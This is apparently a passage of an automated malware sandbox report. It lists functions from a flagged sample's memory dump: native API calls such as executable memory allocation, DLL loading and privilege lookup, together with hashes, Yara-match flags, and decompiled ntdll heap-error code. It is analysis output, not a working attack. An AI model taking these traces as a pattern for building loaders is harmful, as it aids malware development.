NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB44,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F89

Memory Dump Source

Source File: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 21dee396b526e9f6bcc5eeecb5e8ad732dc14a9aca5d94e75c0c980f3e103e8d
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 6BF015B6210208ABCB14DF89CC81EEB77ADAF88754F118549BE0897241C630F810CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 00419EA0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EC5

Memory Dump Source

Source File: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 54e25ba9a063552adfd9097ed26e51ad785c9dec3e015c3cab780b8acab33ba6
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 67D01776200214ABD710EBD9CC85EE77BACEF48760F154499BA589B242C530FA508AE0

Uniqueness

Uniqueness Score: -1.00%

Function 01379910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0137991A

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c5eba1b373a9b377d8b5d46d66783f1edd0b9cb69cb101355cd6a6f2400fade8
Instruction ID: 8a2379189e8abcb37fc6738ffee722cbe5b23ed0d95b2fe2d7520120783ad5c0
Opcode Fuzzy Hash: c5eba1b373a9b377d8b5d46d66783f1edd0b9cb69cb101355cd6a6f2400fade8
Instruction Fuzzy Hash: 399002B520110402D94072998404B461015A7D0345F51C021E5054558EC6998DD976A5

Uniqueness

Uniqueness Score: -1.00%

Function 01379540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0137954A

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ab2f0e7abdb6cb4e8ec32b75350bce5a0b83dc9fd14d9bf0c46aea9d00aa426
Instruction ID: 1d1e3c6d74e3d836fb7d0d41d2632e2a0e8c68c1152d440040d76e1e587428ea
Opcode Fuzzy Hash: 7ab2f0e7abdb6cb4e8ec32b75350bce5a0b83dc9fd14d9bf0c46aea9d00aa426
Instruction Fuzzy Hash: FD900269211100034905B69947049071056A7D5395351C031F1005554CD66188656161

Uniqueness

Uniqueness Score: -1.00%

Function 013799A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 013799AA

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ac121244671a96bdfb500f7f22f8ad3ac9722fbcfe08f63f57564fec58bf6b9a
Instruction ID: 5241518a0fd58329578c199932fcab89ec8d1f114103e384b4865cef92e87ebd
Opcode Fuzzy Hash: ac121244671a96bdfb500f7f22f8ad3ac9722fbcfe08f63f57564fec58bf6b9a
Instruction Fuzzy Hash: F59002A534110442D90072998414F061015E7E1345F51C025E1054558DC659CC567166

Uniqueness

Uniqueness Score: -1.00%

Function 013795D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 013795DA

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dfb34453920e74c9b06088e210e330cd4e87c5704573c19ae0a8bfe38a2b7ae0
Instruction ID: 5ec11af234d851c151557279033c209dd3953e9ae04f12d03633be6ceb3e1f05
Opcode Fuzzy Hash: dfb34453920e74c9b06088e210e330cd4e87c5704573c19ae0a8bfe38a2b7ae0
Instruction Fuzzy Hash: 449002A520210003890572998414A16501AA7E0245B51C031E1004594DC56588957165

Uniqueness

Uniqueness Score: -1.00%

Function 01379860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0137986A

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 066b7524ffb476b495eb94581ab11fd4affde5e6441b9610810313d433d8a3e9
Instruction ID: 796a822eec80e4d905b81bb96e6c34e6fe2d8b04c753ff734f16c6ef49d6ac43
Opcode Fuzzy Hash: 066b7524ffb476b495eb94581ab11fd4affde5e6441b9610810313d433d8a3e9
Instruction Fuzzy Hash: 6A90027520110413D91172998504B071019A7D0285F91C422E041455CDD6968956B161

Uniqueness

Uniqueness Score: -1.00%

Function 01379840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0137984A

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9ac0c9b9933df0461eb412057cf83b203e6f96b68a3d65946fc1213a0681b5cb
Instruction ID: 20b7fd035d22f4f47b54025955d39baf877ab7cef1cfbb9c5e57b92e93af6fde
Opcode Fuzzy Hash: 9ac0c9b9933df0461eb412057cf83b203e6f96b68a3d65946fc1213a0681b5cb
Instruction Fuzzy Hash: D9900265242141529D45B29984049075016B7E0285791C022E1404954CC566985AE661

Uniqueness

Uniqueness Score: -1.00%

Function 013798F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 013798FA

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ea653ebd345714c01a15b5b567508b459113d154dcca118bef979cc0728fc2a7
Instruction ID: ccebcdc377527c87463afb3c78a2741d87c265c5f130b4efa3b320d213691e6b
Opcode Fuzzy Hash: ea653ebd345714c01a15b5b567508b459113d154dcca118bef979cc0728fc2a7
Instruction Fuzzy Hash: 5A90026560110502D90172998404A16101AA7D0285F91C032E1014559ECA658996B171

Uniqueness

Uniqueness Score: -1.00%

Function 01379710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0137971A

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ad898adb86784e52b939558c974225c1adf148f9e573064f92667b123d060bc2
Instruction ID: 174046e2f623f2e52cd946f008e1c789f78c8fafaaa747c14b3774f3dc01f6c4
Opcode Fuzzy Hash: ad898adb86784e52b939558c974225c1adf148f9e573064f92667b123d060bc2
Instruction Fuzzy Hash: BE90027520110402D90076D99408A461015A7E0345F51D021E5014559EC6A588957171

Uniqueness

Uniqueness Score: -1.00%

Function 013797A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 013797AA

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 54134cab902e1483567260a881e8d3d5a3810ce399b25d93c36fa11feaf72b6e
Instruction ID: 862888b7375ab5b9776670fe3b084df1fc02c7177537788e36ccc03159976fd9
Opcode Fuzzy Hash: 54134cab902e1483567260a881e8d3d5a3810ce399b25d93c36fa11feaf72b6e
Instruction Fuzzy Hash: E490026530110003D94072999418A065015F7E1345F51D021E0404558CD955885A6262

Uniqueness

Uniqueness Score: -1.00%

Function 01379780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0137978A

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 03c3ae989cad97693f81c69dde3fdc84980957258065f5dc6cb5ad420ace1ab7
Instruction ID: aebe5bc7a68341b6f5e12b206d351c3d3bacb48eeab1017e8100b0ddfcd4647c
Opcode Fuzzy Hash: 03c3ae989cad97693f81c69dde3fdc84980957258065f5dc6cb5ad420ace1ab7
Instruction Fuzzy Hash: 4990026D21310002D98072999408A0A1015A7D1246F91D425E000555CCC955886D6361

Uniqueness

Uniqueness Score: -1.00%

Function 01379A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01379A2A

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 77ff27fa65a81a23a1fb9b7b3a59f160f94c41710894643823e84ca05c9799ac
Instruction ID: 4e0ee9fd0574b4dafb5c3a25a7074c8b8f573c370a14ac217da9e28c7e15e5ef
Opcode Fuzzy Hash: 77ff27fa65a81a23a1fb9b7b3a59f160f94c41710894643823e84ca05c9799ac
Instruction Fuzzy Hash: F990026560110042894072A9C844D065015BBE1255751C131E0988554DC599886966A5

Uniqueness

Uniqueness Score: -1.00%

Function 01379A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01379A0A

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4ee1e14470f05b32afaa7f109fbda71a773118876649ec4b0d465b4837371372
Instruction ID: 111ff557471a36218fd3392642915b0097179179329ff0920110c0da7f9a3c50
Opcode Fuzzy Hash: 4ee1e14470f05b32afaa7f109fbda71a773118876649ec4b0d465b4837371372
Instruction Fuzzy Hash: 8B90027520150402D90072998814B0B1015A7D0346F51C021E1154559DC665885575B1

Uniqueness

Uniqueness Score: -1.00%

Function 01379660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0137966A

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3d956320992d8432f0599a2e82ab521ec101c96a93bdc13f0b85c3565373ab90
Instruction ID: f9608f8785c938adb3f738eafb392932bae75dd61a715dd108c0c0e500db9f15
Opcode Fuzzy Hash: 3d956320992d8432f0599a2e82ab521ec101c96a93bdc13f0b85c3565373ab90
Instruction Fuzzy Hash: 6790027520110802D98072998404A4A1015A7D1345F91C025E0015658DCA558A5D77E1

Uniqueness

Uniqueness Score: -1.00%

Function 01379A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01379A5A

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cc1ba0f4fdfefce24ef59fe0aca91dbfe67044854495a2522d7fe97d3a62e172
Instruction ID: 96fa65f54ddbaf9d162fc5a949736c364f964d49e04529cfc5107762f40c1818
Opcode Fuzzy Hash: cc1ba0f4fdfefce24ef59fe0aca91dbfe67044854495a2522d7fe97d3a62e172
Instruction Fuzzy Hash: 3E90026521190042DA0076A98C14F071015A7D0347F51C125E0144558CC95588656561

Uniqueness

Uniqueness Score: -1.00%

Function 013796E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 013796EA

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 58dbddc4f7df03f6aaace84001c744bc251ce6b7619fe667b9b731ebdfeb36ba
Instruction ID: 252a5b51a41e3283460ae024f260020af85954495873160a6c040b9ae25d452c
Opcode Fuzzy Hash: 58dbddc4f7df03f6aaace84001c744bc251ce6b7619fe667b9b731ebdfeb36ba
Instruction Fuzzy Hash: 6090027520118802D9107299C404B4A1015A7D0345F55C421E441465CDC6D588957161

Uniqueness

Uniqueness Score: -1.00%

Function 00409A90, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9952e6bd23a8cf809c7f1d31e2a2cdb1a3fa865c0c436f6c56225653b5eb434
Instruction ID: d694cef9faf7f89dfa5a46ff5172319f61a3d8f72cb1e00bbcbd9de5c112db06
Opcode Fuzzy Hash: a9952e6bd23a8cf809c7f1d31e2a2cdb1a3fa865c0c436f6c56225653b5eb434
Instruction Fuzzy Hash: 98210CB2D4020857CB25D665AD42BEF737CEB54314F44017FE949A3182F6387E49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 39aaf3cc670cee8f115237a24b8965cf8fff7ea1e1d29afdbf43c901cc49f9bd
Instruction ID: dce78ad2e707cb95efefefea563c334a82ceef6f90d91f9eac1ede0513526d90
Opcode Fuzzy Hash: 39aaf3cc670cee8f115237a24b8965cf8fff7ea1e1d29afdbf43c901cc49f9bd
Instruction Fuzzy Hash: 5801FC31A4032877E720A6959C03FFF771C6B40F54F04401DFF04BA1C1D6A8690546FA

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACC8, Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42

Memory Dump Source

Source File: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 9b23ef01615a7855b366fe0a1c8d8254ba8a7903e2b0f67870fde6e5a3ae6863
Instruction ID: 7f24d84eef099c7f59f691b8268418a526ce65cc85048aadb81b837fad5e88dc
Opcode Fuzzy Hash: 9b23ef01615a7855b366fe0a1c8d8254ba8a7903e2b0f67870fde6e5a3ae6863
Instruction Fuzzy Hash: DE01A7B5D4020DBBDF10DA94DC45FDDB7759B54308F0081AAED08A7240F134DB548795

Uniqueness

Uniqueness Score: -1.00%

Function 0041A072, Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A0AD

Memory Dump Source

Source File: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 74e76a325ee151148180a19c2db1bea57e76b4d85bcaeb32f429c5e29d36dc5c
Instruction ID: e95e067c94ad8c0e9d655202b683ee172e2eeaf4fc039fb9993a59f08cfe5efc
Opcode Fuzzy Hash: 74e76a325ee151148180a19c2db1bea57e76b4d85bcaeb32f429c5e29d36dc5c
Instruction Fuzzy Hash: 42E0EDB52002006FD714DFA5DC08EEB3B29AF88364F054549F9485B242C230E914CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A040, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A06D

Memory Dump Source

Source File: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: c2f75f23685a3a3035d26e43b004efde96b0f17027f721f1615bddf6f144c8a0
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 2DE012B5210208ABDB14EF99CC41EA777ACAF88664F118559BA085B242C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A080, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A0AD

Memory Dump Source

Source File: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: fa613ce94130c294c78c644c3dc676460f5e04e644236c96d410f3cac1b6f185
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 89E046B5210208ABDB18EF99CC49EE777ACEF88760F018559FE085B252C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1E0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A210

Memory Dump Source

Source File: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: b2a81fd9bfa84999f98766bcaf5da6299346a0de5b601ff3a7585631ec016391
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 84E01AB52002086BDB10DF89CC85EE737ADAF88650F018555BA0857241C934E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0C0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0E8

Memory Dump Source

Source File: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 8052c92922f0d0eedaab6b9fa37bf430534de0eb242e2dbe7c66c9c2d4c77ebf
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 2ED017766102187BD620EB99CC85FD777ACDF487A0F0184A9BA5C6B242C531BA108AE1

Uniqueness

Uniqueness Score: -1.00%

Function 0137967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01379694

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9d1b2d82465ff11d81cd527b3722674fb6ceb966f54de45d3c4aafc6c063520a
Instruction ID: b391db06e168090b17207971dfa3bef90f561082aadb703a8f36c8f9e135875d
Opcode Fuzzy Hash: 9d1b2d82465ff11d81cd527b3722674fb6ceb966f54de45d3c4aafc6c063520a
Instruction Fuzzy Hash: 9BB09B719015C5C5DE11E7A44608F17791077D0769F16C161D1020645B477CC095F6B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 013EB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 013EB38F
*** enter .cxr %p for the context, xrefs: 013EB50D
The instruction at %p referenced memory at %p., xrefs: 013EB432
The resource is owned shared by %d threads, xrefs: 013EB37E
*** A stack buffer overrun occurred in %ws:%s, xrefs: 013EB2F3
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 013EB53F
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 013EB323
an invalid address, %p, xrefs: 013EB4CF
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 013EB47D
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 013EB3D6
Go determine why that thread has not released the critical section., xrefs: 013EB3C5
write to, xrefs: 013EB4A6
*** Resource timeout (%p) in %ws:%s, xrefs: 013EB352
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 013EB484
<unknown>, xrefs: 013EB27E, 013EB2D1, 013EB350, 013EB399, 013EB417, 013EB48E
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 013EB2DC
*** Inpage error in %ws:%s, xrefs: 013EB418
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 013EB39B
The resource is owned exclusively by thread %p, xrefs: 013EB374
The instruction at %p tried to %s , xrefs: 013EB4B6
a NULL pointer, xrefs: 013EB4E0
The critical section is owned by thread %p., xrefs: 013EB3B9
This failed because of error %Ix., xrefs: 013EB446
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 013EB476
*** enter .exr %p for the exception record, xrefs: 013EB4F1
*** An Access Violation occurred in %ws:%s, xrefs: 013EB48F
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 013EB305
*** then kb to get the faulting stack, xrefs: 013EB51C
read from, xrefs: 013EB4AD, 013EB4B2
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 013EB314

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: eb96d02889aeaf795104d721304477892a34b6c39fe2e7877c4410c5b7957aeb
Instruction ID: 26642405292ca97761c5e283fd94090f8401810f4e554a4c273c1b033558316c
Opcode Fuzzy Hash: eb96d02889aeaf795104d721304477892a34b6c39fe2e7877c4410c5b7957aeb
Instruction Fuzzy Hash: D5812375A00330FFDB226A4ACC4ED6B7B69AF56A5DF40405CF5042B29AD271A841CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 013F1C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E013F1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x13148a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0133B150();
				} else {
					E0133B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x142589c);
				E0133B150("Heap error detected at %p (heap handle %p)\n",  *0x14258a0);
				_t27 =  *0x1425898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M013F1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0133B150();
				} else {
					E0133B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0133B150("Error code: %d - %s\n",  *0x1425898);
				_t113 =  *0x14258a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0133B150();
					} else {
						E0133B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0133B150("Parameter1: %p\n",  *0x14258a4);
				}
				_t115 =  *0x14258a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0133B150();
					} else {
						E0133B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0133B150("Parameter2: %p\n",  *0x14258a8);
				}
				_t117 =  *0x14258ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0133B150();
					} else {
						E0133B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0133B150("Parameter3: %p\n",  *0x14258ac);
				}
				_t119 =  *0x14258b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0133B150();
					} else {
						E0133B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x14258b4);
					E0133B150("Last known valid blocks: before - %p, after - %p\n",  *0x14258b0);
				} else {
					_t120 =  *0x14258b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0133B150();
				} else {
					E0133B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0133B150("Stack trace available at %p\n", 0x14258c0);
			}

0x013f1c10
0x013f1c16
0x013f1c1e
0x013f1c3d
0x013f1c3e
0x013f1c20
0x013f1c35
0x013f1c3a
0x013f1c44
0x013f1c55
0x013f1c5a
0x013f1c65
0x013f1c67
0x00000000
0x013f1c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
